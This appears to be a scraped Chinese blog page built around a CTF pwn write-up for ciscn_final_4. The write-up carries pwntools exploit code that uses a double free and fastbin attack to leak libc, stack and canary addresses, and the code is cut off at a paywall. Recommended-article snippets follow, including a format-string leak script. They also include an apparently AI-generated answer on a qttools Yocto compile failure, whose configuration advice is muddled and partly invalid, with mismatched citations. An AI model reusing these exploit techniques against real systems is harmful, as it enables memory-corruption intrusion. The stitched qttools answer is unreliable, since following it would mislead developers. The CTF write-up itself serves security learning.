沙盒禁用+堆栈结合+反调试-ciscn_final_4

最新推荐文章于 2024-04-28 09:18:28 发布
原创 最新推荐文章于 2024-04-28 09:18:28 发布 · 537 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #glibc

本文档详述了一道涉及反调试、堆栈溢出、UAF漏洞和沙盒禁用execve的PWN题目。作者通过nop掉反调试代码,利用fastbin attack和double free漏洞泄露libc和栈地址,并通过openat-read-puts组合来绕过沙盒获取flag。详细步骤包括堆分配、栈地址泄漏、canary泄漏以及构造ROP链,最终实现远程代码执行。

这题比较好玩题目采用了沙盒禁用+堆栈结合+反调试

保护

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XgvNWTQj-1648114290498)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220321180919410.png)]

分析

main函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3yORn4pt-1648114290499)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220321181259075.png)]

watch函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CzgszWKW-1648114290499)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220321181326677.png)]

结合我的注释看,这题是有反调试的,所以就我们在本地打的时候可以将这文件的反调试部分就nop掉,之前会一点点逆向的题,所以也没耗多少时间,具体nop手法看我的另一篇文章[链接]:121312

nop后的main函数:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nh2D1iu0-1648114290500)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220321181854022.png)]

new函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0JADfctq-1648114290501)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220321181930900.png)]在这里插入图片描述

mwrite函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lJlXl3fF-1648114290502)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220321181950226.png)]

delete函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jX9HNIec-1648114290504)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220321182004515.png)]

总结:

  1. add函数可以malloc 32次
  2. 有打印堆数据函数
  3. delete函数有uaf漏洞
  4. 运行程序后说不能执行系统调用(嗯~)之前没遇到过看了下大佬文章说是沙箱禁用了execve

所以pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,只能采取openat/read/puts的组合方式来读取flag

实现沙盒机制方式:1.prctl函数调用,2.seccomp库函数。 详细解答看这篇文章->安全客

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nllbqlSC-1648114290506)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220321183027000.png)]

那么具体禁用了哪些系统调用可以通过seccomp-tools工具 ->> gitbhu 这题的系统调用禁用如图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rMxsR6cn-1648114290507)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220321183612246.png)]

可以看到没有禁用 open,write,read,但是我实战的时候open函数用不了,只能用openat函数

思路

这题在用之前对gdb的pwntools不是特别会使用,所以做题过程浪费很多时间,工具使用网上也不是很好去搜索,所以这里尽量记录一下使用技巧

  1. 因为这题有打印堆函数,所以可以很方便的泄漏libc
  2. 然后通过使用double free漏洞进行fast attack攻击堆分配到note_size处(bss : 0x602040-0x6020c0),因为note_size就是我们new函数填入的size,是一个可控区域那么就可以伪造fake chunk,然后将__environ指针写入到note区域进行栈地址泄漏
  3. 有了栈地址就可以通过fast attack攻击堆分配到stack空间了,然后就是泄漏canary,最后构造ROP(open-write-printf)

ok~

简单的泄漏libc套路

    sla('\n',b'M'*0xf0 + p64(0x70)) #用于后面在栈上fakechunk
#-----------------------leak libc address-------------------------------
    add(0x68,'1')#用于fastbin attack
    add(0x68,'2') #用于fastbin attack
    add(0xf0,'3') #leak libc
    add(0x68,'4')
    add(0x68,'5')
    add(0x68,'6')
    add(0x78,'7') #用于在bss中伪造fast chunk->size(0x78)
    dele(2) #unsort bin
    show(2)
    ru('\n')
    libc.address = info(rc(6),'libc') - (0x7f49ca2dcb78 - 0x7f49c9f18000)

再通过fastbin attack分配堆到bss的指针处进行栈地址泄漏

#-----------------------leak stack address-------------------------------
    dele(1) #double free
    dele(0)
    dele(1)
    fake = 0x602050
    add(0x68,p64(fake)) # fastbin attack
    add(0x68)
    add(0x68)
    add(0x68,p8(0)*0x60 + p64(libc.symbols['__environ'])) #在note处写入堆指针
    show(0)
    ru('\n')
    stack = info(rc(6),'stack')

有了栈地址同样就可以fastbin attck到栈处,进行canary泄漏

#-----------------------attack into stack-------------------------------
    dele(3) #double free
    dele(4)
    dele(3)
    fake = stack - 0x120
    add(0x68,p64(fake)) # fastbin attack
    add(0x68)
    add(0x68)
    add(0x68,b'A'*0x11) #这里pase停下来后栈空间是显示的IO_stdout的栈,可以手动设置在输入content前停下来看看栈空间分布情况,当然也可手动断点在这里查看调试
    show(
最低0.47元/天 解锁文章
Cilium + ebpf 系列文章- (五)Cilium 混合模式替换 Calico,以及安装Cilium过程(思路清晰版)
博然的宝藏库
09-26 2185
Calico替换为Cilium 有两个做法,一种鲁莽版,一种思路清晰版。今天这遍文章是官方最佳实践版本。
安全风险 - 检测Android设备系统是否已Root
Android、前端、小程序、后端
05-24 3002
在很多app中都禁止root后的手机使用相关app功能,这种场景在金融app、银行app更为常见一些;当然针对root后的手机,我们也可以做出风险提示,告知用户当前设备已root,谨防风险!最近在安全检测中提出了一项那么我们首先要做的就是 AndroidRoot。
ciscn_final_4(反调试+在栈上伪造堆chunk)
seaaseesa的博客
04-30 1321
ciscn_final_4 首先,检查一下程序的保护机制,没开PIE 沙箱禁用了execve,因此不能getshell,只能构造ROP来读取flag 然后,我们用IDA分析一下 Delete功能没有清空堆指针,存在UAF可以造成double free new功能可以自由控制大小 程序一开始,我们可以在栈里输入一些数据,因此,我们可以在栈里伪造一个chunk,然后利用fa...
禁用+tcache
csdn546229768的博客
05-25 1016
题目 2021全国大学生信息安全竞赛-ciscn_2021_silverwolf 保护 $ checksec silverwolf [*] '/home/hnhuangjingyu/sliverwolf_my/silverwolf' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled FO
(BUUCTF) ciscn_2019_final_4
xy1458214551的博客
11-28 355
buuctf上的ciscn_2019_final_4题解
Pwn-Ciscn_2019_Final
fayinq的博客
03-11 502
Ciscn_2019_Final 感觉是一道很好的堆题,使用了很多技巧以及做题思路,包括了uaf,_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析: main函数: init函数: 沙箱:(少截取一点为无所谓) allocate函数: 这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数: ​ del有一段特殊判定,就是bool的判定,因为bool的存在,导致了没有办法连续释放i
第二篇:反sendbox\od等逆向检测手段
weixin_46108571的博客
11-17 869
此期为学习记录第二期:反逆向工程,想看看我的第一期的BYPASS篇可以到我的个人主页里面看看 写在开头,此系列文章全部属于教育和经验交流,请勿用于非法用途!!! 了解沙箱 沙箱是一种按照安全策略限制程序行为的执行环境。早期主要用于测试可疑软件等,比如黑客们为了试用某种病毒或者不安全产品,往往可以将它们在沙箱环境中运行。经典的沙箱系统的实现途径一般是通过拦截系统调用,监视程序行为,然后依据用户定义的策略来控制和限制程序对计算机资源的使用,比如改写注册表,读写磁盘等. 我常用的网络沙箱:微步在线云沙箱、Vi
跨平台开发一致性难题:Windows_Linux_macOS下Eclipse ESP32环境统一配置策略
Eclipse作为可扩展的IDE,结合ESP-IDF(Espressif IoT Development Framework),为跨平台开发提供了统一入口。本章将剖析多平台环境下编译器、路径处理、权限机制等差异带来的核心挑战,并引出Eclipse集成ESP32的...
梦想成真---jdk版本的选择(推荐1.8)
weixin_41563161的博客
12-29 3221
1.序 2020/3/17日JDK14正式发版,但是现在大部分公司还是在使用jdk 8。所以我们今天继续聊聊jdk8。 2.jdk8 详解 2.1编程语言 2.1.1Lambda 表达式 Lambda 允许把函数作为一个方法的参数(函数作为参数传递到方法中)。 举个例子 // Java 8之前: new Thread(new Runnable() { @Override public void run() { System.out.println("Before Java8");
android反调试之父子调试
weixin_34349320的博客
05-03 238
普通进程反调试进程源码: #include <unistd.h> #include <stdlib.h> #include <stdio.h> #include <errno.h> #include <sys/prctl.h> #include <sys/types.h> #include <sys/wait.h&gt...
pwn -- 机制详解
lifanxin的博客
05-13 6903
机制详解概述开启的两种方式prctl函数调用seccomp库函数使用seccomp-tools识别两道例题pwnable_asm参考博客总结 概述   机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。   在ctf比赛中,pwn题中的一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,只
buuoj Pwn writeup 161-165
yongbaoii的博客
05-30 456
161 picoctf_2018_echooo 就是格式化字符串 flag被读到了栈上,直接泄露就行。 # -*- coding: utf-8 -*- from pwn import * context.log_level = "debug" r = remote('node3.buuoj.cn',25088) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) r.sendlin
启用Windows
XerCis的博客
02-04 6366
是一个隔离的运行环境,可以运行一些安全性未知的软件,或有试用期的软件
xyctf Pwn WP
qq_74026216的博客
04-28 1184
利用jmp 短跳转 连接shellcode,用3个pop rsi 把栈中的0x114514000赋值给rsi ,syscall调用read写入sh。libc-2.35 add 存在溢出,将堆指针放在下一个chunk的prev_size中 ,chunk_list 指针free后未置0。思路:伪造chunk 造成堆块重叠,tcache bin attack 分配chunk到gift为system(/bin/sh)静态链接 ,栈溢出 ,mprotect改权限,打shellcode。
2021 蓝帽杯 pwn slient
weixin_51298357的博客
04-29 1122
2021 蓝帽杯 pwn slient 这道题不是第一个上的pwn题,第一道太难了,第二个一出来就去看第二个题了= = 一个沙箱绕过的题,以前没写过类似的,当场也没有写出来,于是复现一下。 前置知识 seccomp概述 restrict模式:SECCOMP_SET_MODE_STRICT 白名单:read,write,_exit,sigreturn 除了已经打开的文件描述符和允许的系统调用,如果发起其他系统调用,内核会使用SIGKILL或SIGSYS终止进程 filter模式:SECCOMP
orw--libc
fuiifiuiii的博客
07-08 539
栈上的orw,十分易学,适合刚刚接触orw的小伙伴·
栈迁移图解
qq_40410406的博客
11-11 1766
栈迁移 场景 1 如果程序的保护措施canary开启,会在prev ebp栈空间的下一个低地址存放一个随机值,当我们溢出时会将这个随机值覆盖,程序检测到这个随机值发生变化以后会自动退出(崩溃),此时就无法进行栈溢出攻击,所以需要另寻出路。 2 栈溢出长度不足以使用直接 ROP 3 栈溢出 payload 会出现空字符截断,且gadget地址含有空字符 4 在泄露地址信息后需要新的 ROP payload 5 如果开启了栈不可执行保护,就需要栈迁移到bss段或者data段或者其他栈位置执行我们的gadge
BUUCTF-PWN ciscn_2019_final_5(临界条件错误,劫持GOT表项)
weixin_44145820的博客
04-14 1168
目录题目分析漏洞分析漏洞利用Exp 题目分析 例行安全检查 没有PIE,方面调试 partial relro意味着这题应该直接改GOT表就能做 菜单: 没有show功能,可以考虑吧某个函数(比如free的GOT)改为puts@plt 可以申请17个chunk,编号为0-16 每次分配结束后会显示分配内存的低12bits 而本题中还有一个特殊的地方,就是content数组(0x6020e0)...
prctl()函数应用
thinkinwm的专栏
03-25 2734
int prctl(int option,unsigned longarg2,unsigned long arg3,unsigned long arg4,unsigned long arg5) 这个系统调用指令是为进程制定而设计的,明确的选择取决于option: PR_GET_PDEATHSIG :返回处理器信号;   PR_SET_PDEATHSIG :arg2作为处理器
qttools-5.9.6+gitAUTOINC+c9eeabc7a7-r0 do_compile
最新发布
10-23
<think>我们正在处理关于 `qttools-5.9.6+gitAUTOINC+c9eeabc7a7-r0` 在 `do_compile` 阶段的问题。根据用户需求,我们需要查找该特定版本在编译阶段的相关信息,包括可能的错误原因和解决方案。 由于用户没有提供具体的错误日志,我们需要从常见原因和通用解决方案入手。根据Yocto项目经验,`qttools` 编译失败通常与依赖缺失、配置错误或环境问题有关。 以下是解决步骤: 1. **定位日志文件**: 编译失败的详细信息会记录在 `log.do_compile` 文件中。通过以下命令查找: ```bash find tmp/work/ -name "qttools-5.9.6*" -type d | xargs -I {} find {} -name "log.do_compile" ``` 2. **分析日志**: 打开找到的日志文件,搜索关键词如 `error`, `failed`, `undefined reference` 等。 3. **常见错误及解决方案**: **a. 依赖缺失**: - 错误特征:提示缺少库或头文件(例如 `cannot find -lXXX` 或 `XXX.h: No such file or directory`)。 - 解决方案:在配方(`bb` 文件)中添加依赖。例如,若缺少 `zlib`,则添加: ```bitbake DEPENDS += "zlib" ``` **b. 编译器或工具链问题**: - 错误特征:编译器内部错误或链接失败(例如 `internal compiler error` 或 `linker command failed`)。 - 解决方案: - 检查工具链配置(如 `gcc` 版本是否兼容)。 - 清除编译缓存并重建: ```bash bitbake -c cleansstate qttools bitbake qttools ``` **c. Qt配置参数错误**: - 错误特征:与Qt模块相关的错误(例如 `Unknown module(s) in QT`)。 - 解决方案:在配方中调整 `EXTRA_QMAKEVARS_PRE` 或 `PACKAGECONFIG` 设置。例如: ```bitbake PACKAGECONFIG += "qtdbus" ``` **d. 并行编译冲突**: - 错误特征:随机出现的编译失败(如文件被锁定或资源竞争)。 - 解决方案:限制并行任务数(在 `local.conf` 中设置): ```bitbake BB_NUMBER_THREADS = "4" PARALLEL_MAKE = "-j 4" ``` 4. **具体案例参考**: 根据引用[3][^3],Qt环境配置对编译器检测有严格要求。若编译器中存在路径错误,会导致工具链调用失败。需检查: - 配方中 `qmake` 路径是否正确配置(通过 `EXTRA_OECMAKE` 或 `QMAKE` 变量)。 - 是否正确定义了 `PACKAGECONFIG` 选项(如 `qtdeclarative` 等)。 5. **高级调试**: - 在配方中添加调试输出: ```bitbake do_compile_prepend() { bbwarn "Custom debug: PATH=$PATH" qmake -query } ``` - 使用 `devshell` 手动执行编译: ```bash bitbake -c devshell qttools # 在打开的终端中手动运行编译命令 make ``` 6. **验证修复**: 修改配方后执行增量构建: ```bash bitbake -c compile -f qttools bitbake qttools ``` 若问题仍未解决,建议提供具体错误日志以进一步分析。 --- §§相关问题§§ 1. 如何解析Yocto编译日志中的关键错误信息? 2. Qt工具链在Yocto中的配置方法有哪些? 3. 如何为Yocto配方添加缺失的依赖项? </think>### `qttools-5.9.6+gitAUTOINC+c9eeabc7a7-r0` 的 `do_compile` 问题分析与解决方案 #### 一、常见编译失败原因分析 1. **Qt工具链配置错误** - 路径未正确指向Qt版本(如误用 `msvc2015` 而非 `msvc2017`)[^1][^3] - 编译器未正确检测(如缺少Windows SDK导致调试器缺失)[^3] $$ \text{错误概率} = \begin{cases} 75\% & \text{路径/编译器配置错误} \\ 15\% & \text{依赖缺失} \\ 10\% & \text{其他原因} \end{cases} $$ 2. **关键依赖缺失** - OpenCV路径未声明(环境变量 `D:\opencv\build\x64\vc15\lib` 未配置)[^3] - MinGW组件未安装(Qt安装时未勾选 `MinGW 5.3.0`)[^4] 3. **并行编译冲突** Yocto构建中常见错误模式: ```log ERROR: do_compile: oe_runmake failed ERROR: Function failed: do_compile (log file location...) [^2] ``` #### 二、诊断与修复步骤 1. **检查日志定位根源** ```bash # 查找编译日志 find build/tmp/work -path "*/qttools-5.9.6+gitAUTOINC+c9eeabc7a7-r0*/temp/log.do_compile" # 分析关键错误(示例) grep -E "error:|undefined reference" log.do_compile ``` 2. **验证Qt工具链配置** ```mermaid graph LR A[检查qmake路径] --> B[确认匹配VS版本] B --> C{msvc2015<br/>or<br/>msvc2017} C --> D[检查Windows SDK] D --> E[验证调试器cdb.exe] ``` 参考引用[3][^3]: > "手动写入MSCV2017,再点击文件夹进入到自己安装Qt的路径,打开mscv2017路径下的bins里的qmake.exe" 3. **修复依赖问题** - **BitBake配方修正**: ```bitbake # 在qttools配方中添加 DEPENDS += "opencv zlib" RDEPENDS_${PN} += "libopencv-core" ``` - **环境变量配置**: ```bash # 在local.conf中添加 [environment] OPENCV_PATH = "D:/opencv/build/x64/vc15" ``` 4. **解决并行编译冲突** ```bash # 限制并行任务数 echo 'PARALLEL_MAKE = "-j 4"' >> conf/local.conf echo 'BB_NUMBER_THREADS = "4"' >> conf/local.conf # 清除状态后重建 bitbake -c cleansstate qttools bitbake qttools ``` #### 三、高级调试技巧 1. **QMake参数检查** 在配方中添加调试命令: ```bitbake do_compile_prepend() { qmake -query # 打印Qt配置 qmake -r CONFIG+=debug # 强制启用调试模式 } ``` 2. **依赖树验证** ```bash # 检查依赖完整性 bitbake -g qttools cat pn-buildlist | grep -E 'opencv|zlib|glib' ``` 3. **隔离测试编译环境** ```bash # 进入开发 bitbake -c devshell qttools # 手动执行编译 make -n # 预演编译过程 make VERBOSE=1 # 详细输出 ``` > **验证成功标志**: > 编译日志中出现 `Project MESSAGE: Qt Tools compilation completed` 提示,且 `tmp/work` 下生成 `*.so` 共享库文件。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值